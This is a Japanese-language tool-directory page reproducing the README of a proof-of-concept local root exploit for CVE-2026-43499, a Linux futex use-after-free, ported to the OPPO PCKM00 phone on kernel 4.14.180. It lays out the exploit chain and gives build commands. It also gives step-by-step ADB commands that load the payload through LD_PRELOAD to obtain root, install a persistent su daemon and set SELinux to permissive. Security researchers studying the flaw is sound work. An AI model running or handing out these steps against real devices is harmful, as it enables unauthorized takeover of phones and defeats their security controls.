Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
GhostLock-OPPO-PCKM00 — CVE-2026-43499 GhostLock futex UAF LPE PoC(OPPO PCKM00 (SM6150) / Linux 4.14.180 向け) | Kitploit
ツール/GitHubGitHub/yijiacloud/ghostlock-oppo-pckm00
Androidセキュリティ特権昇格永続化メカニズム脆弱性分析エクスプロイトポストエクスプロイトモバイルセキュリティペイロード開発バイナリエクスプロイト
GitHubyijiacloud/ghostlock-oppo-pckm00

GhostLock-OPPO-PCKM00

CVE-2026-43499 GhostLock futex UAF LPE PoC(OPPO PCKM00 (SM6150) / Linux 4.14.180 向け)

381ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

GhostLock — OPPO PCKM00 (4.14.180) PoC

CVE-2026-43499 (GhostLock) — Linuxカーネルfutex優先度継承における use-after-freeを利用したローカル権限昇格PoC。OPPO PCKM00 (OP4A57, SM6150, Android 11, kernel 4.14.180-perf+) 向けに移植。

DISCLAIMER / 免責事項 このプロジェクトは認可されたセキュリティ研究および教育目的のみを対象としています。 所有していないデバイス、または明示的にテストを許可されていないデバイスでは使用しないでください。 エクスプロイトの実行によりカーネルがクラッシュする可能性があります。作者は誤用や損害について一切の責任を負いません。

本项目仅用于授权的安全研究与教育目的。请勿在非本人所有或未获明确授权的设备上使用。运行利用可能导致内核崩溃,作者不承担任何滥用或损失的责任。


1. 脆弱性

CVE-2026-43499 (GhostLock) は、Linuxカーネルのfutex優先度継承コードにおけるuse-after-freeです。 このバグは、rt_mutex_start_proxy_lock()のプロキシロックロールバックパスでremove_waiter()が誤用されることに起因します。 解放されたrt_mutex_waiter(カーネルスタック上に割り当て)は、pselect()によってコピーされた攻撃者制御のfd_setとして再解釈され、任意書き込みプリミティブを生み出します。

影響範囲: Linux 4.x–6.x(2011年に導入)。4.14系は全面的に影響を受けます。 完全な分析と検証済みシンボルオフセットについてはreport.mdを参照してください。

エクスプロイトチェーン

root@kitploit:~
futex requeue-pi UAF
   └─> pselect fd_set スタックコピー (偽の rt_mutex_waiter / 偽の task)
         └─> 任意書き込み (rt_mutex ツリー操作 / sched_setattr)
               └─> ashmem_fops の上書き -> configfs bin 読み書き
                     └─> pipe_buffer ページ書き換え (物理RWプリミティブ)
                           └─> 現在のタスク cred をパッチ -> root

PoCはLD_PRELOADを介して完全にユーザースペースで実行されます — デバイスの再起動は不要です(カーネルパニックが発生しない限り)。


2. ターゲット

他の4.14デバイスへの移植: exploit/targets/oppo-pckm00/target.hをコピーし、 カーネルイメージからシンボルオフセットを再生成してください(analysis/を参照)。


3. リポジトリ構成

root@kitploit:~
.
├── report.md                    # 完全な脆弱性分析と検証済みオフセット
├── exploit/
│   ├── Makefile                 # preload.so のビルド (Windows NDK / WSL)
│   ├── src/
│   │   ├── preload.c            # LD_PRELOAD エントリ + 強制ディスクログ + su
│   │   ├── main.c               # オーケストレーション (waiter/owner/consumer スレッド)
│   │   ├── slide.c              # KASLR リーク (boot_id / nfulnl ロガー)
│   │   ├── fops.c               # ashmem_fops 上書き + configfs プリミティブ
│   │   ├── pipe.c               # pipe_buffer physrw プリミティブ
│   │   ├── root.c               # タスク走査 + cred パッチ + seccomp/selinux
│   │   ├── util.c               # kernelsnitch, skb ページ準備, カーネル RW
│   │   ├── su_daemon.c          # 組み込み su サーバー (ドロップイン)
│   │   ├── su_blob.S            # su_daemon の .incbin
│   │   └── wallpaper_blob.S     # 壁紙ペイロードの .incbin
│   ├── targets/oppo-pckm00/target.h   # 4.14.180 シンボル/構造体オフセット
│   └── assets/wallpaper.webp    # 組み込み壁紙ペイロード
├── analysis/                    # カーネルイメージ / kallsyms 抽出スクリプト
└── LICENSE                      # Apache-2.0 (アップストリーム GhostLock と同じ)

4. ビルド

Android NDK r29 (aarch64-linux-android30-clang) が必要です。

Windows NDK

root@kitploit:~
set NDK=C:\path\to\android-ndk-r29
make NDK=%NDK%

WSL (推奨)

root@kitploit:~
# NDK を /opt/ndk/android-ndk-r29 に配置 (linux-x86_64 ツールチェーン)
cd exploit
make wsl
# または直接:
bash ../analysis/build_preload.sh

出力: exploit/preload.so (64ビット aarch64 ELF 共有オブジェクト)。

ビルドではsu_daemon.cもPIEバイナリにコンパイルされ、.Sブロブを介して(壁紙とともに).soに埋め込まれます。


5. 使用方法 (ADB)

5.1 ペイロードのプッシュ

root@kitploit:~
# バイナリのみ (リリースアセットまたはローカルビルドから)
adb push preload.so /data/local/tmp/preload.so

# またはリポジトリ構成を使用
adb push exploit/preload.so /data/local/tmp/preload.so
adb shell chmod 755 /data/local/tmp/preload.so

5.2 実行

.soはLD_PRELOADを介してshプロセスにロードされ、そのコンストラクタが エクスプロイトチェーン全体を実行して結果を報告します:

root@kitploit:~
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

成功するとシェルは次のように報告します:

root@kitploit:~
uid=0(root) gid=0(root) ...
[+] ROOT OK pid=<pid> uid=0

現在のプロセス(およびその子プロセス)はrootになります。suデーモンが /apex/com.android.virt/bin/suにインストールされ(/data/local/tmp/suにフォールバック)、 永続化/検証アーティファクトとして埋め込み壁紙が適用されます。

5.3 検証

root@kitploit:~
# 実行後に新しいシェルから
adb shell su -c 'id'

# または root シェルセッションを取得 (対話型 su クライアント)
adb shell /data/local/tmp/su

# SELinux が permissive に切り替わったか確認 (selinux パスがヒットした場合)
adb shell getenforce

5.4 強制リアルタイムディスクログ

すべてのpr_*診断は**/sdcard/Download/log_<timestamp>.txt**にも書き込まれます (/data/local/tmp/log_<timestamp>.txtにフォールバック)。各行でO_SYNC + fsync()を使用するため、 カーネルパニック/再起動後もログが残ります:

root@kitploit:~
adb pull /sdcard/Download/log_*.txt
# または /sdcard が早期にマウントされない場合
adb pull /data/local/tmp/log_*.txt
adb shell cat /sdcard/Download/log_*.txt

ログには各ステージ(KASLRスライド、fops上書き、pipe physrw、credパッチ)と 最終的なuid_after / ROOT OK行が表示されます — 問題を報告する際に添付してください。

5.5 クリーンアップ

root@kitploit:~
adb shell rm -f /data/local/tmp/preload.so /data/local/tmp/log_*.txt
adb shell rm -f /data/local/tmp/su /data/local/tmp/temp_su.sock /data/local/tmp/su_daemon.log
adb reboot   # SELinux/cred 状態または壁紙が変更された場合

注意: エクスプロイトの実行によりカーネルがクラッシュする可能性があります。adbが切断された場合は、 デバイスの再起動を待ってから/sdcard/Download/log_*.txtをプルしてください — 強制 O_SYNC/fsyncログはまさにパニック後も残るものです。


6. 注意事項と制限事項

  • KASLR: PoCはboot_id/nfulnlロガーパス(slide.c)とashmem_fops検証パス(fops.c)を介してスライドをリークします。
  • この移植で処理される4.14と6.xの違い:
    • configfsはレガシーな.read/.writeを使用(read_iter/write_iterなし)、
    • ashmem_fopsにshow_fdinfoがない、
    • generic_file_splice_readがcopy_splice_readを置き換え、
    • selinux_enforcingはstruct selinux_state内に存在、
    • 4.14のrt_mutex_waiter / / レイアウト。

7. クレジット

  • NebuSec — オリジナルのGhostLock研究およびエクスプロイトフレームワーク (IonStack/CVE-2026-43499)、Apache-2.0。 https://github.com/NebuSec/CyberMeowfia
  • KernelSnitch (futexハッシュサイドチャネル) はアップストリームの条件に基づいて組み込まれています。

ライセンス

Apache-2.0 — LICENSEを参照してください。

ツールをダウンロード
フィールド値
デバイスOPPO PCKM00 / OP4A57
SoCQualcomm SM6150
Android11 (RKQ1.200903.002)
セキュリティパッチ2022-09-05
カーネル4.14.180-perf+ (arm64, clang 10.0.7)
ビルドOPPO/PCKM00/PCKM00:11/RKQ1.200903.002/1635513065:user/release-keys
pipe_inode_info
cred
  • 一部の構造体オフセット(例: task_struct.seccomp)はベストエフォートです。seccompのパッチに失敗しても cred上書きによるroot化は妨げられません。
  • エクスプロイトの実行によりカーネルパニックが発生する可能性があります(ターゲット上で約5秒で約97%の信頼性)。隔離されたデバイスを使用してください。